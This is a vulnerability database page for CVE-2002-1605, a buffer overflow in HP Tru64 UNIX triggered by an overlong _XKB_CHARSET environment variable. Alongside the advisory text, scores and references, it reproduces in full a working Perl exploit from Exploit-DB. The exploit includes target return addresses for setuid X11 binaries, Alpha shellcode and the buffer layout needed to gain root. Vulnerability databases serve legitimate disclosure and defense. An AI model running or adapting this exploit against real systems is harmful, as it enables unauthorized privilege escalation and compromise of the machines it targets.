CVE-2002-1605 : Detail

CVE-2002-1605

2.2%V3
Network
2005-03-25
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in HP Tru64 UNIX 5.1a, 5.1, 5.0a, 4.0g, and 4.0f allows attackers to execute arbitrary code via a long _XKB_CHARSET environment variable to (1) dxpause, (2) dxconsole, or (3) dtsession.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 21774

Publication date : 2002-07-09 22h00 +00:00
Author : stripey
EDB Verified : Yes

source: https://www.securityfocus.com/bid/5648/info Tru64 is a commercially available Unix operating system originally developed by Digital. It is distributed and maintained by HP. A buffer overflow has been discovered in the _XKB_CHARSET library. A number of programs depend on the library, including dxconsole, dxpause and dtsession. Because of this flaw, it may be possible for a local user to execute arbitrary instructions. This could lead to the execution of attacker-supplied code, and elevated privileges. #!/usr/bin/perl -w # # Tru64 5.1 _XKB_CHARSET # # stripey ([email protected]) - 10/07/2002 # $tgts{"0"} = pack("l",0x40010250).":/usr/bin/X11/dxconsole:uid=root"; $tgts{"1"} = pack("l",0x40012584).":/usr/bin/X11/dxpause:uid=root"; $tgts{"2"} = pack("l",0x400101e4).":/usr/dt/bin/dtsession:euid=root"; unless (($target,$offset,$align) = @ARGV,$align) { print "-"x72; print "\n Tru64 _XKB_CHARSET overflow, stripey\@snosoft.com, 03/07/2002\n"; print "-"x72; print "\n\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n"; foreach $key (sort(keys %tgts)) { ($a,$b,$c) = split(/\:/,$tgts{"$key"}); print "\t$key. $b ( $c )\n"; } print "\n"; exit 1; } ($a,$b) = split(/\:/,$tgts{"$target"}); print "*** Target: $b, Offset: $offset, Align: $align ***\n\n"; $ret = pack("ll",(unpack("l",$a)+$offset), 0x1); $sc .= "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42"; $sc .= "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2"; $sc .= "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2"; $sc .= "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43"; $sc .= "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43"; $sc .= "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6"; $sc .= "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22"; $sc .= "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26"; $sc .= "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43"; $sc .= "\x20\x35\x60\x42\xff\xff\xff\xff"; $buf_a = "A"x256; $buf_a .= $ret; $buf_b = "B"x$align; if ($target eq "2" ) { $buf_b .= pack("l",0x47ff041f)x56; } else { $buf_b .= pack("l",0x47ff041f)x3750; } $buf_b .= $sc; $ENV{"_XKB_CHARSET"} = $buf_a; $ENV{"HOME"} = $buf_b; exec("$b");

Products Mentioned

Configuraton 0

Hp>>Hp-ux >> Version 10.20

Hp>>Hp-ux >> Version 11.00

Hp>>Hp-ux >> Version 11.04

Hp>>Hp-ux >> Version 11.11

Hp>>Hp-ux >> Version 11.22

Hp>>Tru64 >> Version 4.0f

Hp>>Tru64 >> Version 4.0g

Hp>>Tru64 >> Version 5.0a

Hp>>Tru64 >> Version 5.1

Hp>>Tru64 >> Version 5.1a

References

http://www.kb.cert.org/vuls/id/584243
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.kb.cert.org/vuls/id/569987
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/archive/1/290115
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/693803
Tags : third-party-advisory, x_refsource_CERT-VN